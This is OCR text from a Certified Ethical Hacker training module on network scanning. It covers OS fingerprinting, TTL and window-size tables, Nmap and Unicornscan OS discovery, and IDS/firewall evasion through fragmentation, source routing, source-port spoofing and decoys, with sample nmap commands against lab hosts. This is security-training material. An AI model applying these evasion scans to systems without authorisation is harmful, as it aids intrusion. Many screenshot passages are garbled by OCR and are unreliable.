-_=
IP Network Scanner
[> map -sn -PR IIS server and Windows platform Note: We will discuss passive banner grabbing in later modules.
OS Discovery/Banner Grabbing Banner grabbing, or "OS fingerprinting," is a method used to determine the OS that is running on a remote target system. It is an important scanning method, as the attacker will have a higher probability of success if the OS of the target system is known (many vulnerabilities are OSspecific). The attacker can then formulate an attack strategy based on the OS of the target system.
There are two methods for banner grabbing: spotting the banner while trying to connect to a service, such as an FTP site, and downloading the binary file/bin/ls to check the system architecture. A more advanced fingerprinting technique depends on stack querying, which transfers the packets to the network host and evaluates them by the reply. The first stack-querying method designed with regard to the TCP mode of communication evaluates the response to connection
requests.
The next method, known as initial sequence number (ISN) analysis, identifies the differences in random number generators found in the TCP stack. ICMP response analysis is another method used to fingerprint an OS. It consists of sending ICMP messages to a remote host and evaluating the reply. Two types of banner grabbing techniques are described below:
=
Active Banner Grabbing Active banner grabbing applies the principle that an OS’s IP stack has a unique way of responding to specially crafted TCP packets. This happens because of different interpretations that vendors apply while implementing the TCP/IP stack on a particular OS. In active banner grabbing, the attacker sends a variety of malformed packets to the
Module 03 Page 332
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
remote host, and the responses are compared with a database. Responses from different OS vary because of differences in TCP/IP stack implementation. For instance, the scanning utility Nmap uses a series of nine tests to determine an OS fingerprint or banner grabbing. The tests listed below provide some insights into an active banner grabbing attack, as described at www.packetwatch.net: o
Test 1: A TCP packet with the SYN and ECN-Echo flags enabled is sent to an open TCP
o
Test 2: A TCP packet with no flags enabled is sent to an open TCP port. This type of packet is a NULL packet.
oO
Test 3: A TCP packet with the URG, PSH, SYN, and FIN flags enabled is sent to an open
o
Test 4: A TCP packet with the ACK flag enabled is sent to an open TCP port.
o
Test 5: A TCP packet with the SYN flag enabled is sent to a closed TCP port.
o
Test 6: A TCP packet with the ACK flag enabled is sent to a closed TCP port.
o
Test 7: A TCP packet with the URG, PSH, and FIN flags enabled is sent to a closed TCP
©
Test 8 PU (Port Unreachable): A UDP packet is sent to a closed UDP port. The objective is to extract an “ICMP port unreachable” message from the target machine.
o
Test 9 TSeq (TCP Sequence ability test): This test tries to determine the sequence generation patterns of the TCP initial sequence numbers (also known as TCP ISN sampling), the IP identification numbers (also known as IPID sampling), and the TCP timestamp numbers. It sends six TCP packets with the SYN flag enabled to an open
port.
TCP port.
port.
TCP port.
The objective of these tests is to find patterns in the initial sequence of numbers that the TCP implementations chose while responding to a connection request. They can be categorized into groups, such as traditional 64K (many old UNIX boxes), random increments (newer versions of Solaris, IRIX, FreeBSD, Digital UNIX, Cray, and many others), or true random (Linux 2.0.*, OpenVMS, newer AIX, etc.). Windows boxes use a "time-dependent" model in which the ISN is incremented by a fixed amount for each
occurrence.
=
Passive Banner Grabbing Source: https://www.broadcom.com Like active banner grabbing, passive banner grabbing also depends on the differential implementation of the stack and the various ways in which an OS responds to packets. However, instead of relying on scanning the target host, passive fingerprinting captures packets from the target host via sniffing to study telltale signs that can reveal an OS.
Module 03 Page 333
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Passive banner grabbing includes: o
Banner grabbing from error messages: Error messages provide information, such as type of server, type of OS, and SSL tools used by the target remote system.
o.
Sniffing the network traffic: Capturing and analyzing packets from the target enables an attacker to determine the OS used by the remote system.
o
Banner grabbing from page extensions: Looking for an extension in the URL may help in determining the application version. For example, .aspx => IIS server and Windows platform.
The four areas that typically determine the OS are given below: ©
TTL (time to live) of the packets: What does the OS sets as the Time To Live on the outbound packet?
o
Window Size: What is the Window size set by the OS?
o
Whether the DF (Don’t Fragment) bit is set: Does the OS set the DF bit?
o
TOS (Type of Service): Does the OS set the TOS, and if so, what setting is it?
Passive fingerprinting is neither fully accurate nor limited to these four signatures. However, one can improve its accuracy by looking at several signatures and combining the information. The following is an analysis of a sniffed packet described by Lance Spitzner in his paper on passive fingerprinting: 04/20-21:41:48.129662
TCP
TTL:45
**eKEK*A* Ack:
TOS:0x0
Seq:
OxE3C65D7
129.142.224.3:659
ID:56257
->
172.16.1.107:604
0x9DD90553 Win:
0x7D78
According to the four criteria, the following are identified: o
TTL: 45
o
Window Size: 0x7D78 (or 32120 in decimal)
o
DF: The DF bit is set
o
TOS: 0x0
Compare this information with a database of signatures. TTL: The TLL from the analysis is 45. The original packet went through 19 hops to get to the target, so it sets the original TTL to 64. Based on this TTL, it appears that the user sent the packet from a Linux or FreeBSD box (however, more system signatures need to be added to the database). This TTL confirms it by implementing a traceroute to the remote host. If the trace needs to be performed stealthily, the traceroute TTL (default 30 hops) can be set to one or two hops fewer than the remote host (-m option). Setting the traceroute in this manner reveals the path information (including the upstream provider) without actually contacting the remote host. Module 03 Page 334
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Window Size: In this step, the window sizes are compared. The window size is another effective tool for determining precisely what window size is used and how often it is changed. In the previous signature, the window size is set at 0x7D78, which is the default window size used by Linux. In addition, FreeBSD and Solaris tend to maintain the same window size throughout a session. However, Cisco routers and Microsoft Windows NT window sizes constantly change. The window size is more accurate when measured after the initial three-way handshake (due to TCP slow start). DF bit: Most systems use the DF bit set; hence, this is of limited value. However, this makes it easier to identify a few systems that do not use the DF flag (such as SCO or OpenBSD). TOS: TOS is also of limited value, as it seems to be more session-based than OS-based. In other words, it is not so much the OS as the protocol used that determines the TOS to a large extent.
Using the information obtained from the packet, specifically the TTL and the window size, one can compare the results with the database of signatures and determine the OS with some degree of confidence (in this case, Linux kernel 2.2.x). Passive fingerprinting, like active fingerprinting, has some limitations. First, applications that build their own packets (e.g., Nmap, Hunt, Nemesis, etc.) will not use the same signatures as the OS. Second, it is relatively simple for a remote host to adjust the TTL, window size, DF, or TOS setting on the packets. Passive fingerprinting has several other uses. For example, attackers can use stealthy fingerprinting to determine the OS of a potential target such as a web server. A user only needs to request a web page from the server and then analyze the sniffer traces. This bypasses the need for using an active tool that various IDS systems can detect. Passive fingerprinting also helps in identifying remote proxy firewalls. It may be possible to ID proxy firewalls from the signatures as discussed above, simply because proxy firewalls rebuild connections for clients. Similarly, passive fingerprinting can be used to identify
rogue systems.
Note: We will discuss passive banner grabbing in later modules. Why Banner Grabbing? An attacker uses banner grabbing to identify the OS used on the target host and thus determine the system vulnerabilities and exploits that might work on that system to carry out further attacks.
Module 03 Page 335
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
How to Identify Target System OS
CE H
@ Attackers can identify the OS running on the target machine by looking at the Time To Live (TTL) and TCP window size in the IP header of the first packet in a TCP session ‘@
Window size vanes for OS
Sniff/capture the response generated from the target machine using packet-sniffing tools like Wireshark and observe the TTL and TCP window size fields
Operating System
Linux
64
5840
FreeBsD OpenssD
64 255
65535, 16384
Windows
128
to 1 Gigabyte
eas)
255
4128
Solaris
255
8760
Routers ”
OS Discovery using
AX
Wireshark
To | tcp
65,535 bytes
255
16384
Tiles Janu waresbark org |
How to Identify Target System OS Identifying the target OS is one of the important tasks for an attacker to compromise the target network/machine. In a network, various standards are implemented to allow different OSs to communicate with each other. These standards govern the functioning of various protocols such as IP, TCP, UDP, etc. By analyzing certain parameters/fields in these protocols, one can reveal the details of the OS. Parameters such as Time to Live (TTL) and TCP window size in the IP header of the first packet in a TCP session help identify the OS running on the target machine. The TTL field determines the maximum time that a packet can remain in a network, and the TCP window size determines the length of the packet reported. These values vary among OSs, as described in the following table: Operating System
Time To Live
TCP Window Size
Linux
64
5840
FreeBSD
64
65535
OpenBSD
255
16384
Windows
128
65,535 bytes to 1 Gigabyte
Cisco Routers
255
4128
Solaris
255
8760
AIX
255
16384
Table 3.2: TTL and TCP Window size values for OS
Module 03 Page 336
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Scanning Networks
Attackers can use various tools to perform OS discovery on the target machine, including Wireshark, Nmap, Unicornscan, and Nmap Script Engine. Attackers can also adopt the IPv6 fingerprinting method to grab the target OS details. OS Discovery using Wireshark
Source: https://www.wireshark.org To identify the target OS, sniff/capture the response generated request-originated machine using packet-sniffing tools such as TTL and TCP window size fields in the first captured TCP packet. those in the above table, you can determine the target OS that i Capturing from Ethernet File
Edit
Yiew
Go
uae
475 476 477 478 479 480 481 482 483 484 485 496
Capture
Analyze
Statistics
Telephony
SBREQeeSGTFET
87.537233, 8.107472 88.108065 8.108101 88.108655, 89.120177 89.120710 89.539860 89.539864 89.539905 90.135915, 90.136418,
1803 x i 5 i :
Jools
Help
BAAR
5
0 e
20487: Fels:
Wireless
from the target machine to the Wireshark, etc., and observe the By comparing these values with has generated the response.
gi
2
Protocs Length info PONS 371 Standard query response @x0000 TXT, cache Flush PTR _odb._tep.- | ARP 42 Who has 10.10.2.22? Tell 1 rr ARP 22 As at 00:15:54:01:60: 108 18) request ide@x0001, seqr1/256, ttl=128 (reply in 4. 108 74 Echo (ping) reply id-@xo001, seqei/256, tt1=128 (request in 108 74 Echo (ping) request 1d=@x0001, seq=2/512, tt1=126 (reply in 4 roe 74 Echo (ping) reply ide@xo0ei, seqe2/512, tt1=128 (request in PONS «417 Standard query response @x@000 TXT, cache flush PTR _adb. tcp. MONS 437 Standard query response @x0800 TXT, cache flush PTR _adb._tc MONS «371 Standard query response @x8000 TXT, cache flush PTR _adb._tep.— 108 7A Echo (ping) request ide0x0001, seq=3/768, ttl-128 (reply in 4 Rod 74 Echo (ping) reply 1d=@x0001, seqn3/765, te19128 (request in
Frame 479: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface \Device \NPF_{5A9B3586-F693-4023-B9B6-DCC2SADB1114), id @ Ethernet II, Src: Micros Ost: Microsof 01:80:00 (00:15:5d:01:80:00) rt
nest eet tose ee Meche Cede betes Teriction eased} [Meader checksum status: Unverified) See an a woe eee ; wes aces ae Pn a ey beers) pipeme cree Protocol:
ICMP
(1)
Figure 3.76: Wireshark screenshot showing TTL value (Possible OS is Windows)
Module 03 Page 337
Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohib
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Scanning Networks
4 Capturing from Ethernet File Edt Yew Go Copture Analyze Statistics Telephony Wireless Tools Help ABA2OQUEREQeOSFsTSaanan
(Ueereseeytee co
” ¥
Tne Sexree Destination Protocal Length Info 61 15.757699fesor:15:SdFF:fe18:. Ff02::f 374 Standard query response @x0000 TXT, 62 17.759212 437 Standard query response 0x0008 TXT, 63 17.759261 417 Standard query response @x0008 TXT, 64 17.759279 371 Standard query response @xeeee TXT, 65 21.766189 417 Standard query response @x0000 TXT, 66 21.764190 371 Standard query response @x0080 TXT, 67 22.764189 437 Stondard query response @x@008 TXT, 68 21.985381 f01:80:0@ Broadcast 42 who has [email protected]@.2.9? Tell 10.10.1.32 69 21.985935 _NS-NLB-PhysServer-2_ Microsof_01:60:00 42 10.10.1.9 4s at 02:15:54:18:27:¢ 70 21.985957 _10.10.1.11 10.10.1.9 74 Echo (ping) request ide@x@001, sequ5/1280, ttl=128 (reply in ~ 71 22,986492 [0.10.1.9 _—*4;20.20.2.22 ‘74 Echo (ping) reply ideexo0e1, seqn5/1280, ttl~64 (request in. 72 2.993079 __10.10.1.21 10.20.1.9 sor 74 Echo (ping) request ide@x@001, seq~6/1536, tt]=126 (reply in ~ Frame 71: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface \Device\NPF_{SA983588-F693-4023-8986-DCC29AD81114}, id @ Ethernet IT, Sre: MS-NLB-PhysServer-21 27:eb (02:15:54:18:27:eb), Dst: Microsof_01:80:60 (00:15:5d:01:60:00) Internet Protocol Version 4, Src: 1 e100 .... = Version: 4 sss. O11 = Header Length: 20 bytes (5)
GSESEERRERE
No.
> >
Protocol: ICMP (1) Header Checksum: @xifel [validation disabled] [Meader checksum status: Unverified) ] ja ee eee se" abedef opgrstuy ghijklen wabedefg hi
@ 7 Tmetoine (ot, 1byte Figure 3.77: Wireshark screenshot showing TTL value (Possible OS is Linux)
Module 03 Page 338.
iI Hacking and Countermeasures Copyright © by E¢-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
OS Discovery using Nmap @ InNmap, the -O optionis used to perform OS discovery, providing OS details of the target machine
and Unicornscan
ig iE H
@ InUnicornscan, the OS of the target machine canbe identified by observing the TTL valuesin the acquired scan result
San Tools Dotie Hep
Fira
‘Maap done: 1 TP address (1 host up) Scanned in 2.81
secencs
‘etps//omop.org ~
OS Discovery using Nmap and Unicornscan OS Discovery using Nmap
Source: https://nmap.org To exploit the target, it is highly essential to identify the OS running on the target machine. Attackers can employ various tools to acquire the OS details of the target. Nmap is one of the effective tools for performing OS discovery activities. In Zenmap, the -o option is used to perform OS discovery, which displays the OS details of the target machine.
Module 03 Page 339
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Scanning Networks
© Zenmap Scan
Target:
Profile
Tools
|nmap
|
Profile:
v
Cancel
10.10,
Hosts | Services Nmap Output Ports / Hosts Topology Host Details Scans OS ¢ Host nmap -0 10.10.1.11 v 10.10.1.11
Starting
Nmap
7.8@
22:25 Memmcetin Nmap
Host
scan
is
up
(
https://nmap.org
report
(@.@@s
for
80/tcp 135/tcp 139/tcp
http msrpc netbios-ssn
ieee
Address:
Running:
OS
CPE:
OS
Microsoft
Nmap
Microsoft
Distance:
at
done:
seconds
Windows
cpe:/o:microsoft
detection
results
microsoft-ds
general purpose
OS details:
Network
ftp
@@:15:5D:@1:80:00
Device type:
(Microsoft)
1@
:windows_1@:17@3
Windows
|Op
performed.
Please
IP
(1
1@
1783
report
https://nmap.org/submit/ 1
2022-03-15
latency).
closed ports SERVICE
MAC
at
Details
10.10.1.11
Not shown: 994 PORT STATE
445/tcp
)
Geapteigit Time
21/tep
Filter Hosts
x
Help
| 10.10.1.11
Command:
Oo
address
host
up)
.
any
scanned
incorrect
in
2.81
M4
Figure 3.78: OS Discovery using Zenmap
Module 03 Page 340
Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
OS Discovery using Unicornscan
Source: https://sourceforge.net In Unicornscan, the OS of the target machine can be identified by observing the TTL values in the acquired scan result. To perform Unicornscan, the syntax #unicornscan is used. As shown in the screenshot, the tt1 value acquired after the scan is 128; hence, the OS is possibly Microsoft Windows.
sudo su sword @parr d parrot adding
10.10.1
100, 105-167,
for
attacker
2 mode
‘TCP
109-111,113,
118,119,
ports
‘7,9,11,13,18,19,21-23,25,37,39,42,4 9,50
135, 137-139, 123,129,
143,150, 161-164,
174,177-17:
,500,512-514,5 ,422, 443-445, 487 406 , 407 347 , 369-3 5 106 , 209, 210,21 631-634, 636, 642,653,655 ,657,666 3 1352 1241, 1334, 1349, 234, 1210, 46 992-995, 1001, 1023-1030, 1080, 01-2104,2140,2 5 A 2 1719,1 3306, ) ,5269, 5308
78,61 346,634 165 , 6838, 6666 79,9090, 9101-9103 9359, 10000, 10626, 10027, 1006 27573 , 31335-31338, 2, 21554, 22273, 26274 , 27374, 27444, 5345, 17001-17003, 18753, 20011 54321, 57341, 58008 , 58009, 58666, 5 0, 33390, 47262 , 49301, 54320, 31791, 32668 , 32767 30 , 65530-65535’ pps , 64429, 65000, 65506 61466, 61603, 6348: , 61348, lusing interface(s) etho total packets, should take a Little longer e+02 i ho toal aning 1.00e+00 open 10.10 10.10 10.10 10.10
oak
10.10 10.10 10.10
Possible OS is
than 8 Seconds
Windows
Figure 3.79: OS Discovery using Unicornscan
Module 03 Page 341
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
CEH
OS Discovery using Nmap Script Engine |@ Nmap script engine (NSE) can be used to automate a wide variety of networking
tasks by allowing the users to write and share scripts @ Attackers use various scripts in the Nmap Script Engine to perform OS discovery on the target machine
@ For example, in Nmap, smb-os-discovery is an inbuilt script that can be used for collecting OS information on the target machine through the SMB protocol ‘@
In Zenmap, the -sC option or script option
is used to activate the NSE scripts
pright © by
Tiss aioe ore Al Rights Reserved. Reproduction i
OS Discovery using Nmap Script Engine Source: https://nmap.org Nmap Scripting Engine (NSE) in Nmap can be used to by allowing users to write and share scripts. These same efficiency and speed as Nmap. Attackers can Engine for performing OS discovery on the target discovery is an inbuilt script used for collecting OS the SMB protocol.
automate a wide variety of networking tasks scripts can be executed parallelly with the also use various scripts in the Nmap Script machine. For example, in Nmap, smb-osinformation on the target machine through
In Zenmap, NSE can be generally activated using the -sc option. If the custom scripts are to be specified, then attackers can use the --script option. The NSE results will be displayed with both the Nmap normal and XML outputs.
Module 03 Page 342
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Scanning Networks
ee
Exam 312-50 Certified Ethical Hacker
Edit @parrot
Host INot
PORT
ima script g Nmap 7.9.
smb-os-discover n org
is up
Latency)
an
shown:
53/tcp
report
for
983
filtered
(0.0094s
STATE
SERVICE
open
http
open
80/tcp
88/tcp
135/tcp
open
open
msrpc
open
http-rpc-epmap
open open open open
e
Cc
login
open
msmq-mgmt
open
globalcatLDAPss
open open
Address:
script
globalcatLDAP ms-wbt-server
00:15:5D:01:80:02
(Microsoft)
results
smb-os-discovery
Windows
Computer
(no-response
netbios-ssn ldap microsoft-ds kpasswd5
open
OS:
ports
kerberos
open
Host
tcp
2022-03
domain
open open
C
10.10.1
) at
Server
name:
2022
Server2022
Standard
20348
(Windows
Serve
2022
Standard
6.3)
Figure 3.80: OS Discovery using Nmap Script Engine
Module 03 Page 343
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
OS Discovery using IPv6 Fingerprinting
CE H
@ IPV6 Fingerprintingcan be used to identify the OS runningon the target machine
A
© IPvé6 fingerprinting has the same functionality as that of IPv4
MA
\@ The difference between IPv6 and IPv4 fingerprintingis that the IPv6 uses several additional
probes specificto IPv6 alongwith a separate OS detection engine that is specialized for IPv6
@ In Zenmap, the -6 option and -O option are used to perform OS discovery using the IPv6 fingerprintingmethod © Syntax: # nmap -6-O
advanced
—s ——e e
Copyright © by
OS Discovery using IPv6 Fingerprinting Source: https://nmap.org IPv6 Fingerprinting is another technique used to identify the OS running on the target machine. It has the same functionality as IPv4, such as sending probes, waiting and collecting the responses, and matching them with the database of fingerprints. The difference between IPv6 and IPv4 fingerprinting is that IPv6 uses several additional advanced |IPv6-specific probes along with a separate IPv6-specifc OS detection engine. Nmap sends nearly 18 probes in the following order to identify the target OS using the IPv6 fingerprinting method. =
Sequence generation (S1-S6)
=
ICMPvé6 echo (IE1)
=
ICMPvé6 echo (IE2)
=
Node Information Query (NI)
=
Neighbor Solicitation (NS)
=
UDP (U1)
=
TCP explicit congestion notification (TECN)
=
TCP (12-17)
In Zenmap, the -6 option along with -o fingerprinting method. Syntax: # nmap
Module 03 Page 344
-6
-O
option is used to perform OS discovery using the IPv6
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
CEH
LO#06: Demonstrate Various Techniques for Scanning Beyond IDS and Firewall
Scanning Beyond IDS and Firewall Intrusion detection systems attacker from accessing a limitations. Attackers try to various IDS/firewall evasion spoofing, etc.
Module 03 Page 345
(IDS) and firewalls are security mechanisms intended to prevent an network. However, even IDS and firewalls have some security launch attacks to exploit these limitations. This section highlights techniques such as packet fragmentation, source routing, IP address
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
IDS/Firewall Evasion Techniques ‘@
CE H
Though firewalls and IDSs can prevent malicious traffic (packets) from entering a network, attackers can manage to send intended packets to the target by evading an IDS or firewall through the following techniques:
EW
racket Fragmentation
MAC Address Spoofing
EZ
source Routing
Creating Custom Packets
Source Port Manipulation
Randomizing Host Order and Sending Bad Checksums
IP Address Decoy
Proxy Servers
IP Address Spoofing
Anonymizers served. Reproduction
IDS/Firewall Evasion Techniques Although firewalls and IDS can prevent malicious traffic (packets) from entering a network, attackers can send intended packets to the target that evade the IDS/firewall by implementing the following techniques: =
Packet Fragmentation
=
Source Routing
=
Source Port Manipulation
=
IP Address Decoy
=
IP Address Spoofing
=
MAC Address Spoofing
=
Creating Custom Packets
=
Randomizing Host Order
=
Sending Bad Checksums
=
Proxy Servers
=
Anonymizers
Module 03 Page 346
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Packet Fragmentation
CE H
@ Packet fragmentation refers to the splitting of a probe
packet into several smaller packets (fragments) while
© Zenon Sean Tool Bree Hep
-
x
D] ean (cone
sending it to a network
Toplogy Hest Data Scan ra) at 2022-05-16
@ Itis not anew scanning method but a modification of the
previous techniques
|G The TCP header is split into several packets so that the packet filters are not able to detect what the packets are intended to do
0
Be ote is eeetteche of oss 0.08
SYN/FIN Scanning Using IP Fragments ‘SYN/FIN (Small IP
Attacker
: ae ebiiby Hidde elapsed (x00e
Target Copyright © by
Packet Fragmentation Packet fragmentation refers to the splitting of a probe packet into several smaller packets (fragments) while sending it to a network. When these packets reach a host, the IDS and firewalls behind the host generally queue all of them and process them one by one. However, since this method of processing involves greater CPU and network resource consumption, the configuration of most IDS cause them to skip fragmented packets during port scans.
Therefore, attackers use packet fragmentation tools such as Nmap and fragroute to split the probe packet into smaller packets that circumvent the port-scanning techniques employed by IDS. Once these fragments reach the destined host, they are reassembled to form a single packet. SYN/FIN Scanning Using IP Fragments
SYN/FIN scanning using IP fragments is not a new scanning method but a modification of previous techniques. This process of scanning was developed to avoid false positives generated by other scans because of a packet filtering device on the target system. The TCP header splits into several packets to evade the packet filter. For any transmission, every TCP header must have the source and destination port for the initial packet (8-octet, 64-bit). The initialized flags in the next packet allow the remote host to reassemble the packets upon receipt via an Internet protocol module that detects the fragmented data packets using field-equivalent values of the source, destination, protocol, and identification.
Module 03 Page 347
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
SYN/FIN (Small IP
Fragments) + Port (n) 5CCE COCO E Coe
RST (if port is closed) Attacker
Target Figure 3.81: SYN/FIN scanning
In this scan, the system splits the TCP header into several fragments and transmits them over the network. However, IP reassembly on the server side may result in unpredictable and abnormal results, such as fragmentation of the IP header data. Some hosts may fail to parse and reassemble the fragmented packets, which may lead to crashes, reboots, or even network device monitoring dumps. Some firewalls might have rule sets that block IP fragmentation queues in the kernel (e.g., CONFIG_IP_ALWAYS_DEFRAG option in the Linux kernel), although this is not widely implemented because of its adverse effects on performance. Since many IDS use signature-based methods to indicate scanning attempts on IP and/or TCP headers, the use of fragmentation will often evade this type of packet filtering and detection, resulting in a high probability of causing problems on the target network. Attackers use the SYN/FIN scanning method with IP fragmentation to evade this type of filtering and detection.
Module 03 Page 348
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
The screenshot below shows the SYN/FIN scan using the Zenmap tool.
© Zenmap Scan Tools Profile Help Target: 10.10.1.11 Command:
i
OS
| nmap
4 Host
Profile: -v 10.10.1.11
Nmap Output Ports / Hosts Topology Host Details Scans nmap -sS -T4 -A -f -v 10.10.1.11
Details
Starting Nmap 7.8@ ( https://nmap.org ) at 2022-03-16 02:55 f pan Ti Warning: Packet fragmentation selected on a host other than Linux, OpenBSD, FreeBSD, or NetBSD. This may or may not work. NSE: Loaded 151 scripts for scanning. Script Pre-scanning. Initiating NSE at @2:55 Completed NSE at @2:55, 0.@0s elapsed Initiating NSE at 02:55 Completed NSE at @2:55, @.0@s elapsed Initiating NSE at @2:55 Completed NSE at @2:55, 0.@0s elapsed Initiating ARP Ping Scan at @2:55 Scanning 10.10.1.11 [1 port] Completed ARP Ping Scan at @2:55, @.02s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 02:55 Completed Parallel DNS resolution of 1 host. at @2:55, @.@1s elapsed Initiating SYN Stealth Scan at @2:55 Scanning 10.10.1.11 [1000 ports] Discovered open port 445/tcp on 10.10.1.11 Discovered open port 139/tcp on 10.10.1.11 Discovered open port 135/tcp on 10.10.1.11 Discovered open port 3389/tcp on 10.10.1.11 Discovered open port 8@/tcp on 10.10.1.11 Discovered open port 21/tcp on 10.10.1.11 Completed SYN Stealth Scan at @2:55, 1.45s elapsed (1000 total ports) Initiating Service scan at 02:55
Filter Hosts
Figure 3.82: SYN/FIN scan using Zenmap
Module 03 Page 349
Ethical Hacking and Countermeasures Copyright © by EC-Cot All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
CEH
Source Routing ‘@
As the packet travels through the nodes in the network, each router examines the destination IP address and
chooses the next hop to direct the packet to the destination
@ Source routing refers to sending a packet to the intended destination with a partially or completelyspecified route (without firewall-/IDS-configured routers) in order to evade an IDS or firewall ‘@
Insource routing, the attacker makes some or all of these decisions on the router
This figure shows source routing,
where the originator dictates the eventual route of the traffic
‘AZ Sendes ¥
B
Source Routing An IP datagram contains various fields, including the IP options field, which stores source routing information and includes a list of IP addresses through which the packet travels to its destination. As the packet travels through the nodes in the network, each router examines the destination IP address and chooses the next hop to direct the packet to the destination. When attackers send malformed packets to a target, these packets hop through various and gateways to reach the destination. In some cases, the routers in the path might configured firewalls and IDS that block such packets. To avoid them, attackers enforce a strict source routing mechanism, in which they manipulate the IP address path in the IP field so that the packet takes the attacker-defined path (without firewall-/IDS-configured to reach the destination, thereby evading firewalls and IDS.
routers include loose or options routers)
The figure below shows source routing, where the originator dictates the eventual route of the traffic.
Destination
c Figure 3.83: Source Routing
Module 03 Page 350
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Source Port Manipulation
CE H
@ Source port manipulation refers to manipulating actual port numbers with common port numbers in order to evade an IDS or firewall @ Itoccurs when a firewall is configured to allow packets from well-known ports like HTTP, DNS, FTP, etc. ‘@ Nmap uses the -g or --source-port options to perform source port manipulation
Firewall allowing manipulated
Port 80 to the victim from attacker
sea
Target 1001.11
ue
8s
S) Profi
je
&
etps//amep. org
Source Port Manipulation Source port manipulation is a technique used for bypassing the IDS/firewall, where the actual port numbers are manipulated with common port numbers for evading certain IDS and firewall rules. The main security misconfigurations occur because of blindly trusting the source port number. The administrator mostly configures the firewall by allowing the incoming traffic from well-known ports such as HTTP, DNS, FTP, etc. The firewall can simply allow the incoming traffic from the packets sent by the attackers using such common ports. Actual Port: 242
Attacker
>
Manipulated Port: 80
‘ Port 242
Ter
ei
a
Allowed Prrerer irri rrr itieey —> Port 80 Victim
Figure 3.84: Firewall allowing manipulated port 80 to the victim from attacker
Although the firewalls can be made secure using application-level proxies or protocol-parsing firewall elements, this technique helps the attacker to bypass the firewall rules easily. The attacker tries to manipulate the original port number with the common port numbers, which can easily bypass the IDS/firewall. In Zenmap, the -g or --source-port option is used to perform source port manipulation.
Module 03 Page 351
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
® Zenmap Scan
Tools
Target:
Profile
Help
| 10.10.1.11
Command:
Hosts
|nma
Services
OS 4 Host 10.10.1.11
Nmap Output Ports/Hosts Topology Host Details Scans
nmap -g 80 10.10.1.11
Details
Starting Nmap 7.82 ( http: /nmap.org ) at 2022-@3-16 00:41 Mami’) MmQUNge Time Nmap scan report for 10.10.1.11 Host is up (@.0@s latency). Not shown: 994 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server MAC Address:
Filter Hosts
v
00
1D:@1:88:@@ (Microsoft)
Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds
o
Figure 3.85: Scanning over Firewall using Zenmap
Module 03 Page 352
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
IP Address Decoy
CE H
@ IP address decoy technique refers to generating or manually specifying the IP addresses of decoysin order to evade an IDS or firewall @ Itappears to the target that the decoys as well as the host(s) are scanning the network ‘@
This technique makes it difficult for the IDS or firewall to determine which IP address was actually scanning the network and which IP addresses were decoys
